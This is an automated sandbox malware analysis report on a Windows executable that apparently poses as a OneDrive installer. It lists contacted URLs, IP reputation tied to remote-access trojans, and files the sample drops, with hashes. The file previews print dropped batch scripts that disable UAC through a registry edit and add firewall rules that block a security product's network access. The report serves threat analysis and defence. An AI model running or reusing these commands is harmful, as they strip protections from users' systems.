                                            https://oiuecvb-1341436096.cos.ap-hongkong.myqcloud.com/gg.binYyJLckVp9HE.exe, 00000000.00000002.1498111901.000001ECD6677000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://clients.config.gcc.office.net/odb/v1.0/synchealthUpdateRingSettingsManager::TryUpdateF:yJLckVp9HE.exefalse
                                              high
                                              https://clients.config.office.net/collector/v1.0/inventoryodbyJLckVp9HE.exe, 00000000.00000002.1498111901.000001ECD6677000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://psstatic.cdn.bcebos.com/video/wiseindex/aa6eef91f8b5b1a33b454c401_1660835115000.pngyJLckVp9HE.exe, 00000000.00000002.1498208964.000001ECD8412000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://dc.services.visualstudio.com/v2/track8NyJLckVp9HE.exefalse
                                                    high
                                                    https://pss.bdstatic.com/r/www/static/font/cosmic/pc/cos-icon_8bae49a.cssyJLckVp9HE.exe, 00000000.00000002.1498208964.000001ECD8412000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://g.live.com/odclientsettings/MsitSlowV2yJLckVp9HE.exe, 00000000.00000002.1498014858.000001ECD6618000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://clients.config.office.net/user/v1.0/tenantassociationkey25.016393=%I.%MyJLckVp9HE.exefalse
                                                          high
                                                          http://pss.bdstatic.com/r/www/cache/static/global/img/pc_direct_42d6311.png)yJLckVp9HE.exe, 00000000.00000002.1498208964.000001ECD8412000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://g.live.com/odclientsettings/MsitFastV2yJLckVp9HE.exe, 00000000.00000002.1498014858.000001ECD6618000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs
                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              43.132.105.214
                                                              hk.file.myqcloud.comJapan4249LILLY-ASUSfalse
                                                              103.235.46.115
                                                              www.wshifen.comHong Kong
                                                              55967BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtdfalse
                                                              IP
                                                              127.0.0.1
                                                              Joe Sandbox version:42.0.0 Malachite
                                                              Analysis ID:1636026
                                                              Start date and time:2025-03-12 10:21:26 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 6m 48s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:15
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:yJLckVp9HE.exe
                                                              renamed because original name is a hash value
                                                              Original Sample Name:c1a1f806fd88d08167ae9556c1977c01fa9d83a90dcf37718fe15563471b2945.exe
                                                              Detection:MAL
                                                              Classification:mal56.evad.winEXE@2/10@2/3
                                                              EGA Information:Failed
                                                              HCA Information:Failed
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe
                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                              • Excluded IPs from analysis (whitelisted): 13.92.180.205, 23.60.203.209, 4.245.163.56, 20.190.159.71
                                                              • Excluded domains from analysis (whitelisted): onedsblobvmssprdeus04.eastus.cloudapp.azure.com, fs.microsoft.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
                                                              • Execution Graph export aborted for target yJLckVp9HE.exe, PID 7272 because there are no executed function
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                              TimeTypeDescription
                                                              05:22:47API Interceptor1x Sleep call for process: WerFault.exe modified
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              43.132.105.214NwMw4o9Owv.exeGet hashmaliciousGhostRat, ValleyRATBrowse
                                                                cf8vgd4hLY.exeGet hashmaliciousFatalRAT, GhostRat, NitolBrowse
                                                                  103.235.46.115SecuriteInfo.com.Program.Unwanted.5412.9015.527.exeGet hashmaliciousPureLog StealerBrowse
                                                                  • www.baidu.com/
                                                                  NwMw4o9Owv.exeGet hashmaliciousGhostRat, ValleyRATBrowse
                                                                  • www.baidu.com/
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  hk.file.myqcloud.comhttps://fp-1337510260.cos.ap-hongkong.myqcloud.com/dz/dzfp.zipGet hashmaliciousUnknownBrowse
                                                                  • 43.132.105.194
                                                                  NwMw4o9Owv.exeGet hashmaliciousGhostRat, ValleyRATBrowse
                                                                  • 43.132.105.214
                                                                  cf8vgd4hLY.exeGet hashmaliciousFatalRAT, GhostRat, NitolBrowse
                                                                  • 43.132.105.214
                                                                  http://www.telegramai.org/Get hashmaliciousUnknownBrowse
                                                                  • 43.132.105.108
                                                                  cYDCUkIGVB.exeGet hashmaliciousUnknownBrowse
                                                                  • 43.132.105.194
                                                                  cYDCUkIGVB.exeGet hashmaliciousUnknownBrowse
                                                                  • 43.132.105.194
                                                                  setup#U767b#U9646#U67e5#U8be2#U7cfb#U7edf.exeGet hashmaliciousUnknownBrowse
                                                                  • 43.132.105.108
                                                                  XLSX202400000050346888uninst.exeGet hashmaliciousUnknownBrowse
                                                                  • 43.132.105.108
                                                                  147.exeGet hashmaliciousUnknownBrowse
                                                                  • 43.132.105.108
                                                                  setupPDF.exeGet hashmaliciousUnknownBrowse
                                                                  • 43.132.105.108
                                                                  www.wshifen.comsetup_2025.03.11install.exeGet hashmaliciousUnknownBrowse
                                                                  • 103.235.46.115
                                                                  SecuriteInfo.com.Program.Unwanted.5412.9015.527.exeGet hashmaliciousPureLog StealerBrowse
                                                                  • 103.235.46.115
                                                                  letsVPN.exeGet hashmaliciousUnknownBrowse
                                                                  • 103.235.46.102
                                                                  letsVPN.exeGet hashmaliciousUnknownBrowse
                                                                  • 103.235.46.115
                                                                  rael-uninst.exeGet hashmaliciousUnknownBrowse
                                                                  • 103.235.46.115
                                                                  SecuriteInfo.com.Trojan.Siggen16.38079.12043.8136.exeGet hashmaliciousUnknownBrowse
                                                                  • 103.235.46.102
                                                                  NwMw4o9Owv.exeGet hashmaliciousGhostRat, ValleyRATBrowse
                                                                  • 103.235.46.115
                                                                  http://wap.fxzch.cn/Get hashmaliciousUnknownBrowse
                                                                  • 103.235.47.188
                                                                  cf8vgd4hLY.exeGet hashmaliciousFatalRAT, GhostRat, NitolBrowse
                                                                  • 103.235.46.96
                                                                  https://m.dancingmummy.com/Get hashmaliciousUnknownBrowse
                                                                  • 103.235.47.188
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  LILLY-ASUSInv#8653763981_2sfgPaymentAdvice.svgGet hashmaliciousHTMLPhisherBrowse
                                                                  • 43.152.64.207
                                                                  .svgGet hashmaliciousHTMLPhisherBrowse
                                                                  • 43.152.64.193
                                                                  resgod.sh4.elfGet hashmaliciousMiraiBrowse
                                                                  • 43.61.74.23
                                                                  resgod.mips.elfGet hashmaliciousMiraiBrowse
                                                                  • 40.171.13.139
                                                                  resgod.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                  • 40.224.153.255
                                                                  resgod.ppc.elfGet hashmaliciousMiraiBrowse
                                                                  • 40.146.194.168
                                                                  ATT48234.svgGet hashmaliciousHTMLPhisherBrowse
                                                                  • 43.153.232.151
                                                                  https://inv18993383.cloudfaxservice.de/MSovS?e=amatuer_script_kiddys@pwned.comGet hashmaliciousHTMLPhisherBrowse
                                                                  • 43.152.64.207
                                                                  #U25baPlay_VM-NowATTT0003.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                  • 43.128.193.190
                                                                  https://site-xtxg5.powerappsportals.com/Get hashmaliciousHTMLPhisherBrowse
                                                                  • 43.128.193.190
                                                                  BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtdsetup_2025.03.11install.exeGet hashmaliciousUnknownBrowse
                                                                  • 103.235.46.115
                                                                  SecuriteInfo.com.Program.Unwanted.5412.9015.527.exeGet hashmaliciousPureLog StealerBrowse
                                                                  • 103.235.46.115
                                                                  letsVPN.exeGet hashmaliciousUnknownBrowse
                                                                  • 103.235.46.102
                                                                  letsVPN.exeGet hashmaliciousUnknownBrowse
                                                                  • 103.235.46.115
                                                                  morte.m68k.elfGet hashmaliciousUnknownBrowse
                                                                  • 106.12.228.196
                                                                  morte.mpsl-20250307-0226.elfGet hashmaliciousUnknownBrowse
                                                                  • 106.12.176.208
                                                                  morte.arm.elfGet hashmaliciousUnknownBrowse
                                                                  • 106.12.21.224
                                                                  morte.sh4.elfGet hashmaliciousUnknownBrowse
                                                                  • 106.13.166.137
                                                                  morte.mips.elfGet hashmaliciousUnknownBrowse
                                                                  • 106.12.228.172
                                                                  morte.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                  • 106.13.95.116
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  37f463bf4616ecd445d4a1937da06e19DTSSymmetryDLL.dll.dllGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                  • 43.132.105.214
                                                                  Setup.exeGet hashmaliciousUnknownBrowse
                                                                  • 43.132.105.214
                                                                  TEDGRQXB.exeGet hashmaliciousVidarBrowse
                                                                  • 43.132.105.214
                                                                  Setup.exeGet hashmaliciousUnknownBrowse
                                                                  • 43.132.105.214
                                                                  scripthook.zipGet hashmaliciousUnknownBrowse
                                                                  • 43.132.105.214
                                                                  1776871603.exeGet hashmaliciousClipboard HijackerBrowse
                                                                  • 43.132.105.214
                                                                  MG710417.exeGet hashmaliciousAzorultBrowse
                                                                  • 43.132.105.214
                                                                  RFQ.exeGet hashmaliciousDarkCloudBrowse
                                                                  • 43.132.105.214
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  C:\Users\Public\Downloads\20250312042223\bin.execf8vgd4hLY.exeGet hashmaliciousFatalRAT, GhostRat, NitolBrowse
                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):65536
                                                                    Entropy (8bit):1.1201077941406117
                                                                    Encrypted:false
                                                                    SSDEEP:192:OzP1qPv+da02i19kPjrZFprDijLzuiFyZ24lO8Y:iPMPv+dh2i19kPj+LzuiFyY4lO8Y
                                                                    MD5:707869CFF97CC559CE6C629BE42BDC28
                                                                    SHA1:60080BA8D18FFAEE8E798BAC05FF344C6E846932
                                                                    SHA-256:F6083E04779EB46F04676EF7BA61EBFC14DC36AC5B2616D8B7AFDF7357D3B6F3
                                                                    SHA-512:BEC21AFB1BD34718C051BD832A2837C223947F32D899C57550F5AB6E03C17B23B8856E1E777EB6D1D8EB6368A9891BBE8EFE805172E774ECC7F7E1CC4776F2C3
                                                                    Malicious:true
                                                                    Reputation:low
                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.6.2.4.4.9.5.7.7.3.2.0.7.3.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.6.2.4.4.9.6.1.5.2.8.9.4.1.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.2.c.8.c.6.1.7.-.e.5.5.e.-.4.a.b.b.-.b.e.4.d.-.1.0.8.b.4.5.d.c.b.6.4.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.1.2.a.0.2.a.9.-.a.3.b.f.-.4.b.d.2.-.8.8.c.b.-.8.8.8.4.c.e.4.a.a.2.3.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.y.J.L.c.k.V.p.9.H.E...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.O.n.e.D.r.i.v.e.S.e.t.u.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.6.8.-.0.0.0.1.-.0.0.1.9.-.9.1.6.9.-.1.2.4.3.3.0.9.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.5.a.3.0.4.4.e.5.2.d.b.5.7.6.9.b.2.2.2.9.5.6.f.9.5.f.3.c.0.d.6.0.0.0.0.0.9.0.4.!.0.0.0.0.6.1.d.8.4.3.e.9.5.a.c.3.a.8.b.9.2.d.6.b.9.5.4.a.7.b.5.3.8.1.e.3.7.9.b.7.f.9.d.5.!.y.J.L.c.k.V.p.9.
                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):8876
                                                                    Entropy (8bit):3.7012799000599395
                                                                    Encrypted:false
                                                                    SSDEEP:192:R6l7wVeJ8bA46YZ7jzgmfO4iX1kprC89brsMfa5m:R6lXJQf6YFjzgmfO4iX1CrPft
                                                                    MD5:4B43D766812781DF4A8055E083B53636
                                                                    SHA1:9A8BB655C9F1F90118C0103C110851D85C73DC30
                                                                    SHA-256:516174F65349CB8F68DF514779D4E30E0772AD41BE4C27FCADAFFB62AA2C8C0A
                                                                    SHA-512:0635743D693E10E384351B2E0CD539F36FE268D0E2753CF43F40749FB31106FAA58A175BF49C6467FDC2CDA41CB85F8C06244158235043B2851B92B83E60BA77
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.2.7.2.<./.P.i.
                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):4852
                                                                    Entropy (8bit):4.49518488185946
                                                                    Encrypted:false
                                                                    SSDEEP:48:cvIwWl8zsYtJg771I9z4WpW8VY9Ym8M4JcLX6Fvdyq8viLXm5813sfuG4d:uIjfYHI7Ux7VZJcjmWijm58138uG4d
                                                                    MD5:36A6EEDB30B54B4A951C1BC93DE37154
                                                                    SHA1:122570568C9F2E9DF2D3753168F1418811DADBC3
                                                                    SHA-256:18876A90B8BBAE3A9EB3E3E398D7E889A09A61D48750C495892750CBC5C0851E
                                                                    SHA-512:2C7939B4011A8E32BCBDFABC3C7B6861306BDA5B7B0D72653C0A6B26651B952DD25AA4051406486BB860FCB535E19B774ED50283E644F14D2AED75DB29C1DA17
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="757465" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                    File Type:Mini DuMP crash report, 14 streams, Wed Mar 12 09:22:41 2025, 0x1205a4 type
                                                                    Category:dropped
                                                                    Size (bytes):173696
                                                                    Entropy (8bit):1.613208119702497
                                                                    Encrypted:false
                                                                    SSDEEP:384:lykR1w1mj0k44bfzh3he9HWcP0zq2TmciucUDuYsnOrdwwIL+AHnPYx:Fi1iPvh3hhmtYsn97dHAx
                                                                    MD5:C89238E65E34D554DD1BF9D37C9259C4
                                                                    SHA1:4FBC0E01CE7761B47811F63AC76BD2C06DC2D081
                                                                    SHA-256:73C5E96DE1A95CDB169E11A78934A8D2006AD6FBE9657F42D5291D51FF73B737
                                                                    SHA-512:A2EA68359F8BC5852E83E36857AF994E0F74CD1B4614965AC1E20FD46040403FCC88B9A1E263B0CFECF12DFC711B6F3B34C319EEEAB0A49A9D67AE3068E450C5
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:MDMP..a..... .......aR.g........................ ...............Te..........T.......8...........T...........8K..H[...........&...........'..............................................................................eJ.......(......Lw......................T.......h...OR.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\yJLckVp9HE.exe
                                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):229
                                                                    Entropy (8bit):5.136861700349042
                                                                    Encrypted:false
                                                                    SSDEEP:6:h6PzYLxiH1jhRiRe66nW9BWGDAIFos7/RKrAoU:/LMVjhRWe/oBWGcxyZKW
                                                                    MD5:FA42EBB1071ABC0E618C296EA2CF71A6
                                                                    SHA1:9E0C0737B0E37B3E821D011EECD9B0C7C9F2A15A
                                                                    SHA-256:395F835731D25803A791DB984062DD5CFDCADE6F95CC5D0F68D359AF32F6258D
                                                                    SHA-512:0ED9919675C224201996CAEEECF625A1DB00A70AF5D3BA135DC3D6FA16BFCC562426C813E21B4E861F04D312635BE3528D79B5C49B23E78161F2B051FA9AAF05
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:@echo off.. ..reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f.. ..echo UAC has been disabled. Please restart your computer for the changes to take effect...
                                                                    Process:C:\Users\user\Desktop\yJLckVp9HE.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1373744
                                                                    Entropy (8bit):7.919350873764469
                                                                    Encrypted:false
                                                                    SSDEEP:24576:PJvK78SzsMZCRMp8nFNJ3dcj7zql5Tnoo6WOnLpymOovCce36Ft6pAlxzIBaGq:FK783MoXnFv3dcj7q5LsLp3CceMuczXr
                                                                    MD5:7411AF49C639E972108B78C2B8BC0348
                                                                    SHA1:51D794A98A32340992A542088A45D0BC0E5566B7
                                                                    SHA-256:71FFAF0D2CC9C28CE0234E5E72BBB3BEA387DF8587E528C8E514616E602405FF
                                                                    SHA-512:B84CD4063C4ADEF3C211570BEF0F758B455BF998E7B90C265CF7459F5D0C319AB43A4A244935847C7FC9023EDDA9FAA1F40AC107739C2F9A7B5C035ED575C073
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Joe Sandbox View:
                                                                    • Filename: cf8vgd4hLY.exe, Detection: malicious, Browse
                                                                    Reputation:low
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../..VNe.VNe.VNe.<f.\Ne.<`..Ne.<a.BNe..$a.GNe..$f.DNe..$`.{Ne."%l.PNe.<d.[Ne.VNd. Ne."%..WNe.VN..aNe."%g.WNe.RichVNe.........PE..L...1..d.........."......x..........tS............@..................................7....@.....................................x.... ..H...............0L..............T...............................@............................................text....v.......x.................. ..`.rdata..Fo.......p...|..............@..@.data...............................@....rsrc...H.... ......................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\yJLckVp9HE.exe
                                                                    File Type:DOS batch file, ISO-8859 text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):1885
                                                                    Entropy (8bit):5.9228835526520625
                                                                    Encrypted:false
                                                                    SSDEEP:24:wqWAgtujp0hNwsnSHZL6SHgQzA4La+q4La9wlp0UNwsukS7uK6SOQz1Eo4u99LV6:fNNgSqQzA4LaH4La+H5YIQz1T9rZc9
                                                                    MD5:3A7CB580BD340505F6DC5B4C829A3ECA
                                                                    SHA1:21CC730517D74FA1D13316D7E0D817F3BD710906
                                                                    SHA-256:1C1528B546AA29BE6614707CBE408CB4B46E8ED05BF3FE6B388B9F22A4EE37E2
                                                                    SHA-512:C224FA676542B90F8FC990E574028AF664DCED61612855290FB23CE4ACAD2D6B9043E901365939106B591B6746B3E4DDADA15EEDE88A947051E9D8083194E630
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:@echo off..setlocal enabledelayedexpansion....:: ...............set filePath=C:\ProgramData\lnk\123.txt....:: ..... path ......set pathVar=....:: ................................for /f "delims=" %%i in (%filePath%) do (.. set "pathVar=!pathVar!%%i"..)....:: ................for /f "tokens=* delims= " %%i in ("!pathVar!") do set pathVar=%%i....:: ..............echo ..........!pathVar!..........:: ......................set program_path=!pathVar!....:: .......................................netsh advfirewall firewall add rule name="Block Program Network Access" dir=in action=block program="%program_path%" enable=yes..netsh advfirewall firewall add rule name="Block Program Network Access" dir=out action=block program="%program_path%" enable=yes....echo ................................///////////////////////////......:: .............set file_path=!pathVar!....:: ... "safemon\360tray.exe" ......set modified_path=%file_path:safemon\360tray.exe=
                                                                    Process:C:\Users\user\Desktop\yJLckVp9HE.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):1285507
                                                                    Entropy (8bit):7.999820125672324
                                                                    Encrypted:true
                                                                    SSDEEP:24576:zWEV88zsA/4HI3+n7Tb3dcPh/klVTno0EIunn7WCO+vCeuzCZtmZAlrzKBvlrgs:z98NAwVn7n3dcPhgVLsn7vCeuSyCzDs
                                                                    MD5:EAA96E960B3705B11A7E77EDF9BA91CC
                                                                    SHA1:20D9F34E0E650BE5F199116673CFE5F30A8B5EA6
                                                                    SHA-256:336E67C6744A6BD70BF687EE7987822689A5FF40D96958E442855090FED6CC2B
                                                                    SHA-512:CE2A131ECA5D87114CA86DAC503461B92379A95D85CFD8791C9BDD8B729DF47E573347F5108428BF4C4E5CD1A4F31552A1B4558FEA5AE2534D08595F9BC45A41
                                                                    Malicious:false
                                                                    Preview:KD..........................1...b.a.t...x.%..J.0.........`...]ub...Y.@..5...T..z./..Hvb..e..Ht.q...k.1.]..q........mP}.w.&..E.!:..^R.(.r..<..(..=.]W...Ds..=)T..y.7C.oP9<....NN..d2.D.....q..dB.,&..$X.......2..d.2.!.@..uY...8K.....f.......0...b.i.n...e.x.e...x..{|.U.0\...+I'.@..D...4.F...A.@'...CL..$.....aR....+=C.X.3.....3... ..K7as........5..Fb.`...9U............-.R.S.<.9.y....o?.Y9...O.9..3..s..?..e.~-....+;,+~w...r75>...;.......@.....F.....]..*...6l.>##-..1..t._..d./T.pj...q....<U.....<U............UW.{...m8....p2..........;..wO.....`=.&.<.......|C"....n.tr[...OciR.\......>'q\2....s1'#....sq+.y...7.o...n+>.&q..O.../N.`........{n....W."../.3...._....q....6[......yr9...7.)..qe..m...m...z..7.q=.\@.4...I....M.w.3k+.....G.....>....H..I....J.r......o_.R........{%............YM..\..e...z.'J.:Lt.[..L.....O.+....C'..!]..C...Ba)O..l%>].+.$....S....(.7....u..........F..z...(.....E.Db......#..!]..C...\ .j....?..R....../..C..U..=Ey_.<.}.)G.../S...O,...
                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                    Category:dropped
                                                                    Size (bytes):1835008
                                                                    Entropy (8bit):4.473866354334857
                                                                    Encrypted:false
                                                                    SSDEEP:6144:W9Zfpi6ceLPx9skLmb0fvZWSP3aJG8nAge03BQqZaKFFIeC/DNcXetdLrI:KZHtvZWOcxQqYzruutC
                                                                    MD5:69FB3CD211EE2DCCDAF5DEC319246BF4
                                                                    SHA1:E723DB96281A68C4B682F301EC3E61A3C76F7F93
                                                                    SHA-256:688FE014148D1B239001B0D26A42955B5E84F8A735694989723C148E6DCE3AAE
                                                                    SHA-512:3EA714DE162C8DA27A3BE7B32B4A03D2D0769B98E7D8A6A626555D3C3CE4CC182D5DD21B5B0F8D504F3FC375767EA00D451B7B93934C92A982162DE2736FEF67
                                                                    Malicious:false
                                                                    Preview:regfL...L....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..[.d...............................................................................................................................................................................................................................................................................................................................................|.M ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                    Category:dropped
                                                                    Size (bytes):32768
                                                                    Entropy (8bit):3.9497318526140823
                                                                    Encrypted:false
                                                                    SSDEEP:768:ynYDoUrDjyutmUu/mR8OdzszO2qlo2ysUee+tw:yn9uMUu+RIrm
                                                                    MD5:DE4EA4BBF65D47345164DB05E03613B2
                                                                    SHA1:7380535945A3BC9F371E5A13717E7D1E44F5275B
                                                                    SHA-256:5DA2F6AB14C857BA701601F07446993A15792DC09F0C8B2289CEB42C376F4B4C
                                                                    SHA-512:E16C2AD0E8201A32ED2979F97715F3719ACC49CEEF344258D1A85B7C0666B1F1127BD13E1EAD347035582A97A34E8CA4C51F90CDFE546724132A67B9DDB0CFE1
                                                                    Malicious:false
                                                                    Preview:regfK...K....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..[.d...............................................................................................................................................................................................................................................................................................................................................z.M HvLE.n......K...........0C. Y....O#.|...................................... ..hbin.................\.Z............nk,..\.Z....................h...................................<.......&...{11517B7C-E79D-4e20-961B-75A811715ADD}..`...sk..........^...........\...l.............H.........?...................?...................?........... ... ........... ... ...................$.N..........vk..4...`...........CreatingCommand.....O.n.e.D.r.i.v.e.S.e.t.u.p...e.x.e. ./.s.i.l.e.n.t...
                                                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                    Entropy (8bit):7.975601386285233
                                                                    TrID:
                                                                    • Win64 Executable GUI (202006/5) 92.65%
                                                                    • Win64 Executable (generic) (12005/4) 5.51%
                                                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                                                    • DOS Executable Generic (2002/1) 0.92%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:yJLckVp9HE.exe
                                                                    File size:83'686'952 bytes
                                                                    MD5:7285b39e32a20337160514724e5d8be4
                                                                    SHA1:c2063fa66f784e3ca1c2162a8db3425655cf8c78
                                                                    SHA256:c1a1f806fd88d08167ae9556c1977c01fa9d83a90dcf37718fe15563471b2945
